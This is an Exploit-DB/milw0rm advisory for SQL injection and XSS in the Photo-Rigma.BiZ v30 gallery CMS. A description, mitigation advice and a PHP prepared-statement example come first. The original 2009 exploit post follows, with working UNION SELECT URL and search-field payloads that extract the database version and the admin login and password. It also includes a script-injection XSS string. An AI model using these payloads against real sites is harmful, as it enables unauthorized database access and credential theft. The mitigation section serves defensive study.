Vendor: Photo-Rigma.BiZ
By: Photo-Rigma.BiZ Team
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Photo-Rigma.BiZ
Affected Version From: v30
Affected Version To: v30
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Remote SQL Injection (SQLi) Vulnerability

Photo-Rigma.BiZ v30 is vulnerable to remote SQL injection. An attacker can execute arbitrary SQL commands against the application's database, which can be used to bypass authentication and to access, modify, and delete data in the database.

Mitigation:

All user-supplied input should be validated and filtered before it is used in SQL queries. Additionally, parameterized queries should be used so that input is passed to the database as data and is never interpreted as SQL.
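The mitigation above as an added example (not code from Photo-Rigma.BiZ or from the advisory): a profile lookup and a search query written with PDO prepared statements, plus output encoding for the search term. The in-memory SQLite database, the `real_name` column, the sample rows and the helper names `find_profile`, `search_users` and `render_term` are assumptions made for the example.

```php
<?php
// Added example: constructed schema and data, not Photo-Rigma.BiZ source code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, login TEXT, password TEXT, real_name TEXT)');
$db->exec("INSERT INTO user VALUES (1, 'admin', 'constructed-hash-1', 'Site Admin'),
                                   (2, 'alice', 'constructed-hash-2', 'Alice')");

// Profile lookup: accept only a positive decimal integer for uid, then bind it.
function find_profile(PDO $db, string $uid): ?array
{
    $id = filter_var($uid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything else never reaches the database
    }
    $stmt = $db->prepare('SELECT id, real_name FROM user WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Search: bind the term as data and escape LIKE wildcards so % and _ match literally.
function search_users(PDO $db, string $term): array
{
    $escaped = strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
    $stmt = $db->prepare("SELECT id, real_name FROM user WHERE real_name LIKE :q ESCAPE '!'");
    $stmt->bindValue(':q', '%' . $escaped . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Encode the search term before echoing it back into the results page.
function render_term(string $term): string
{
    return htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs in the shape of the advisory's strings, shortened for this schema.
$uid  = '1 AND 0 UNION ALL SELECT login,password FROM user WHERE id=1/*';
$term = "%' AND 0 UNION ALL SELECT login,password FROM user WHERE id=1#";

var_dump(find_profile($db, $uid));    // rejected by the integer check
var_dump(find_profile($db, '2'));     // ordinary lookup still works
var_dump(search_users($db, $term));   // whole string is matched as literal text
var_dump(search_users($db, 'admin')); // ordinary search still works
echo render_term('"><script>alert(1)</script>'), PHP_EOL; // markup characters become entities
```

Against MySQL the same code applies with a `mysql:` DSN; setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes PDO use server-side prepared statements.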

Exploit-DB raw data:

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                    LONG LIVE SPAIN!...WE WILL WIN THE WORLD CUP!...o.O                    **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	   REMOTE SQL INJECTION (SQLi) VULNERABILITY	             	     |
|--------------------------------------------------------------------------------------------|
|                         	|      Photo-Rigma.BiZ v30     |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|-->WEB: http://foto.rigma.biz (affected)		     				     |
|-->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/ 	   		             |
|-->DEMO: http://foto.rigma.biz								     |
|-->CATEGORY: CMS / Portals								     |
|-->DESCRIPTION: Photo gallery open source project.	                                     |
|-->RELEASED: 2009-04-24								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: N/A										     |
|-->CATEGORY: SQL INJECTION (SQLi) / XSS						     |
|-->AFFECT VERSION: V30						     			     |
|-->Discovered Bug date: 2009-04-24							     |
|-->Reported Bug date: 2009-04-24							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: To my girlfriend Marijose...brother, sister-in-law, parents (and friends xD) for their support. |
|-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)	     |
----------------------------------------------------------------------------------------------


    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| SQL INJECTION  ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||




<<<<<<<<ºººººººººººººº----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------ººººººººººººººº>>>>>>>>
				CONDITION: magic_quotes_gpc=off
<<<<<<<<ººººººººººººº---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------ººººººººººººººº>>>>>>>>



#######################
#######################
## PROOF OF CONCEPT: ##
#######################
#######################


1.- Get var ::::: "uid":



http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*



2.- Search Post Form ::::: "poisk":



%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#



~~~---->>Return: version and database.


###############
###############
##  EXPLOIT: ##
###############
###############


1.-


http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*



2.-


%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#



~~~---->>Return: login and password for user id one (admin).



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| XSS (SEARCH)   ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||



Search Post Form --> "><script>alert('y3nh4ck3r was here!')</script>



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##       GREETZ TO: JosS and all spanish Hack3Rs community!          ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-04-24]